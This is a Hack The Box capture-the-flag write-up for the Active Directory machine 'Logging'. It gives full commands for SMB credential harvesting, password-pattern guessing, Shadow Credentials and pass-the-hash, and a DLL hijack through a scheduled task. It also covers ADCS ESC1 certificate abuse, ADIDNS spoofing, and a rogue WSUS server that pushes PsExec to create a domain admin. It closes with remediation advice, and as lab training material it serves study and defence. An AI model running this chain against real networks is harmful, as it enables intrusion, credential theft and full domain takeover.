HTB Logging: Credential Exposure → Shadow Credentials → DLL Injection → WSUS Poisoning
Box HTB non-retired. Entre le mot de passe pour lire le writeup.
Introduction
Logging is a Medium-rated Active Directory machine that chains five distinct attack techniques: credential exposure in SMB shares, password pattern inference, Shadow Credentials on a gMSA via GenericWrite ACL, DLL injection through a scheduled task, and WSUS poisoning via rogue HTTPS server.
Attack Overview
[START] wallace.everette / Welcome2026@ (provided)
│
├─[SMB]─► Logs share → IdentitySync_Trace.log
│ BindUser: svc_recovery
│ BindPass: Em3rg3ncyPa$$2025 (old)
│
├─[Pattern]─► Em3rg3ncyPa$$2026 (year rotation)
│ Confirmed via Kerberos clock skew
│
├─[BloodHound]─► svc_recovery ──GenericWrite──► MSA_HEALTH$ (gMSA)
│ MSA_HEALTH$ ──memberOf──► Remote Management Users
│
├─[Shadow Credentials]─► Inject RSA key in msDS-KeyCredentialLink
│ PKINIT auth → NT hash
│
├─[WinRM PtH]─► Shell as MSA_HEALTH$
│
├─[UpdateMonitor]─► DLL injection → runs as jaylee.clifton → user.txt
│ + certreq -submit → UpdateSrv cert for wsus.logging.htb
│
├─[ADIDNS]─► wsus.logging.htb → attacker IP
│
├─[WSUS Poisoning]─► pywsus + stunnel (HTTPS:8531)
│ Fake update → PsExec64 /s → SYSTEM
│
└─[SYSTEM]─► new admin user → WinRM → root.txtReconnaissance & Nmap
Add the domain to /etc/hosts:
echo "10.129.245.130 logging.htb" | sudo tee -a /etc/hosts
export IP=10.129.245.130Full Nmap scan reveals key ports:
| Port | Service | Notes |
|---|---|---|
| 53 | DNS | Active Directory DNS |
| 80 | HTTP | IIS 10.0 default page |
| 88 | Kerberos | Domain Controller |
| 389/636 | LDAP | AD LDAP |
| 445 | SMB | Windows file sharing |
| 5985 | WinRM | Remote management |
| 8530 | HTTP | WSUS |
| 8531 | HTTPS | WSUS over SSL |
Initial credentials provided: wallace.everette / Welcome2026@
SMB Enumeration – Credential Exposure
List SMB shares:
smbclient -L //10.129.245.130 -U 'wallace.everette%Welcome2026@'Interesting share: Logs. Connect and download:
smbclient //10.129.245.130/Logs -U 'wallace.everette%Welcome2026@'
smb: \> get IdentitySync_Trace_20260219.logSearch for sensitive data:
grep -iE "password|passwd|credential|secret|token|bind" IdentitySync_Trace_20260219.logOutput:
{ Domain: "logging.htb", Server: "DC01", BindUser: "LOGGING\svc_recovery",
BindPass: "Em3rg3ncyPa$$2025", Timeout: 30 }Credentials obtained (expired): svc_recovery:Em3rg3ncyPa$$2025
Password Pattern Inference
The password follows a pattern: Em3rg3ncyPa$$YYYY. The likely current password is Em3rg3ncyPa$$2026.
Test via Kerberos (Protected Users blocks NTLM):
nxc smb 10.129.245.130 -u 'svc_recovery' -p 'Em3rg3ncyPa$$2026' --kerberosThe error KRB_AP_ERR_SKEW (clock skew) indicates the password is correct but time is out of sync. Synchronize time or use faketime:
faketime '2026-06-05 03:00:00' nxc smb 10.129.245.130 -u 'svc_recovery' \
-p 'Em3rg3ncyPa$$2026' --kerberosOutput: [+] logging.htb\svc_recovery:Em3rg3ncyPa$$2026
LDAP & BloodHound
Enumerate users and groups:
nxc ldap 10.129.245.130 -u 'wallace.everette' -p 'Welcome2026@' --users --groupsNotable groups:
Emergency Recovery→ member:svc_recoveryIT→ member:jaylee.cliftonDomain Admins→ members:toby.brynleigh,AdministratorRemote Management Users→ member:MSA_HEALTH$
BloodHound reveals the critical path:
svc_recoveryhasGenericWriteoverMSA_HEALTH$MSA_HEALTH$is a member ofRemote Management Users→ WinRM access
Shadow Credentials Attack on MSA_HEALTH$
GenericWrite allows writing to the msDS-KeyCredentialLink attribute. Inject a public key to authenticate via PKINIT.
Using pywhisker:
python3 pywhisker.py -d "logging.htb" -u "svc_recovery" -p "Em3rg3ncyPa$$2026" \
--target "MSA_HEALTH$" --action "add" --filename msa_health --password "P@ssw0rd123!"Output: msa_health.pfx generated.
Extract NT hash using PKINIT:
python3 gettgtpkinit.py -cert-pfx msa_health.pfx -pfx-pass "P@ssw0rd123!" \
logging.htb/MSA_HEALTH$ msa_health.ccache
python3 getnthash.py -key <AS-REP enc key> logging.htb/MSA_HEALTH$NT hash: 603fc24ee01a9409f83c9d1d701485c5
WinRM Foothold as MSA_HEALTH$
Pass-the-Hash to connect via Evil-WinRM:
evil-winrm -i 10.129.245.130 -u 'MSA_HEALTH$' -H '603fc24ee01a9409f83c9d1d701485c5'DLL Injection via UpdateMonitor
Discovery:
- Scheduled task
UpdateChecker Agentruns every 3 minutes asjaylee.clifton. - The binary
C:\Program Files\UpdateMonitor\UpdateMonitor.exelooks forC:\ProgramData\UpdateMonitor\Settings_Update.zip - It extracts
settings_update.dlland callsPreUpdateCheck.
Permissions:
MSA_HEALTH$can write toC:\ProgramData\UpdateMonitorjaylee.cliftonhas full control overC:\Program Files\UpdateMonitor
Craft a 32-bit DLL (the binary is 32-bit):
// settings_update.c
#include <windows.h>
#include <stdlib.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
return TRUE;
}
__declspec(dllexport) void PreUpdateCheck() {
system("cmd.exe /c type C:\\Users\\jaylee.clifton\\Desktop\\user.txt "
"> C:\\ProgramData\\UpdateMonitor\\Logs\\out.txt");
}Compile:
i686-w64-mingw32-gcc -shared -o settings_update.dll settings_update.c -static
zip -j Settings_Update.zip settings_update.dllUpload via WinRM:
nxc winrm 10.129.245.130 -u 'MSA_HEALTH$' -H '603fc24ee01a9409f83c9d1d701485c5' \
--put-file Settings_Update.zip 'C:\ProgramData\UpdateMonitor\Settings_Update.zip'Grant read permissions:
nxc winrm 10.129.245.130 -u 'MSA_HEALTH$' -H '603fc24ee01a9409f83c9d1d701485c5' \
-X 'icacls "C:\ProgramData\UpdateMonitor\Settings_Update.zip" /grant "Everyone:(R)"'Wait up to 3 minutes. Retrieve output:
nxc winrm 10.129.245.130 -u 'MSA_HEALTH$' -H '603fc24ee01a9409f83c9d1d701485c5' \
-X 'type C:\ProgramData\UpdateMonitor\Logs\out.txt'User flag:
[redacted]WSUS Poisoning – Privilege Escalation to SYSTEM
From jaylee.clifton’s documents, a file Incident_4922_WSUS_Remediation_ViewExport.html reveals:
- DC01 pulls updates from
wsus.logging.htb(HTTPS port 8531) - DNS record for
wsus.logging.htbis missing (NXDOMAIN) - A scheduled task
ForceSyncrestartswuauservevery 120 seconds
Step 1 – ADIDNS Spoofing
Any authenticated domain user can add a new DNS record. Add wsus.logging.htb pointing to attacker IP:
python3 dnstool.py -u 'logging.htb\wallace.everette' -p 'Welcome2026@' \
-r wsus.logging.htb -d 10.10.14.191 --action add 10.129.245.130Step 2 – ADCS Certificate for wsus.logging.htb (ESC1)
The UpdateSrv certificate template allows enrollee-supplied SAN and server authentication EKU. jaylee.clifton is in the IT group and can enroll.
Generate a key pair and CSR for wsus.logging.htb:
openssl genrsa -out wsus_kali.key 2048
openssl req -new -key wsus_kali.key -out wsus_kali.csr \
-subj "/CN=wsus.logging.htb" \
-addext "subjectAltName=DNS:wsus.logging.htb" \
-addext "extendedKeyUsage=serverAuth"Upload the CSR via WinRM (as MSA_HEALTH$), then use a DLL payload running as jaylee.clifton to submit it to the CA:
# Upload CSR
CSR_B64=$(base64 -w 0 wsus_kali.csr)
nxc winrm 10.129.245.130 -u 'MSA_HEALTH$' -H '603fc24ee01a9409f83c9d1d701485c5' \
-X "[IO.File]::WriteAllBytes('C:\\ProgramData\\UpdateMonitor\\wsus_kali.csr', \
[Convert]::FromBase64String('$CSR_B64'))"The DLL payload (submitted via the same UpdateMonitor mechanism) runs:
system("cmd.exe /c certreq -submit "
"-config \"DC01.logging.htb\\logging-DC01-CA\" "
"-attrib \"CertificateTemplate:UpdateSrv\" "
"C:\\ProgramData\\UpdateMonitor\\wsus_kali.csr "
"C:\\ProgramData\\UpdateMonitor\\wsus_kali.cer "
"> C:\\ProgramData\\UpdateMonitor\\Logs\\cert.txt 2>&1");Retrieve the signed certificate:
nxc winrm 10.129.245.130 -u 'MSA_HEALTH$' -H '603fc24ee01a9409f83c9d1d701485c5' \
--get-file 'C:\ProgramData\UpdateMonitor\wsus_kali.cer' wsus_kali.cerStep 3 – Rogue WSUS Server
Use pywsus with stunnel to serve a malicious update over HTTPS.
Prepare stunnel.conf:
[wsus]
accept = 8531
connect = 127.0.0.1:8530
cert = wsus_stunnel.pem
key = wsus_kali.keyCombine certificate and key for stunnel:
cat wsus_kali.cer wsus_kali.key > wsus_stunnel.pemStart pywsus (HTTP on 8530) and stunnel:
python3 pywsus.py -H 0.0.0.0 -p 8530 \
-e PsExec64.exe \
-c '/accepteula /s cmd.exe /c "net user rooter R00t3r2026! /add && \
net localgroup Administrators rooter /add && \
net localgroup \"Remote Management Users\" rooter /add"' \
--log-file /tmp/pywsus.log &
stunnel4 /tmp/stunnel.conf &Trigger the DC to check for updates via WinRM shell:
wuauclt /detectnow
wuauclt /updatenowThe DC sends a request to the rogue WSUS server, downloads PsExec64.exe, and executes it as SYSTEM. A new user rooter is created.
Connect as rooter:
evil-winrm -i 10.129.245.130 -u 'rooter' -p 'R00t3r2026!'Root flag:
type C:\Users\toby.brynleigh\Desktop\root.txt[redacted]Key Takeaways
| Vulnerability | Root Cause | Remediation |
|---|---|---|
| Credentials in log files | Verbose logging of LDAP bind credentials | Never log secrets; use secrets managers |
| Overly permissive SMB share | Logs share readable by low-privileged users | Apply least-privilege access controls |
| GenericWrite on gMSA | Excessive ACL permissions | Audit BloodHound regularly; monitor Event ID 5136 |
| Predictable password rotation | Year suffix pattern negates Protected Users benefit | Use random passwords; password manager |
| DLL injection via scheduled task | BUILTIN\Users write access to directory where executable loads DLLs | Restrict write permissions; use WDAC/AppLocker |
| ADIDNS spoofing | Default DNS record creation by any authenticated user | Restrict DNS record creation; monitor changes |
| ADCS ESC1 (enrollee-supplied SAN) | Misconfigured certificate template | Disable “Enrollee Supplies Subject” unless required; restrict enrollment rights |
| WSUS over HTTP without DNS validation | Missing DNS record; WSUS not using HTTPS properly | Use HTTPS; secure DNS records; validate WSUS server identity |
Resources
- Nmap — Port scanning
- smbclient — SMB enumeration
- NetExec (nxc) — LDAP, WinRM, SMB automation
- pywhisker — Shadow Credentials attack
- evil-winrm — WinRM shell
- dnstool.py — ADIDNS manipulation
- pywsus — WSUS rogue server
- stunnel — TLS wrapper for HTTP services
- Impacket — gettgtpkinit.py, getnthash.py, PsExec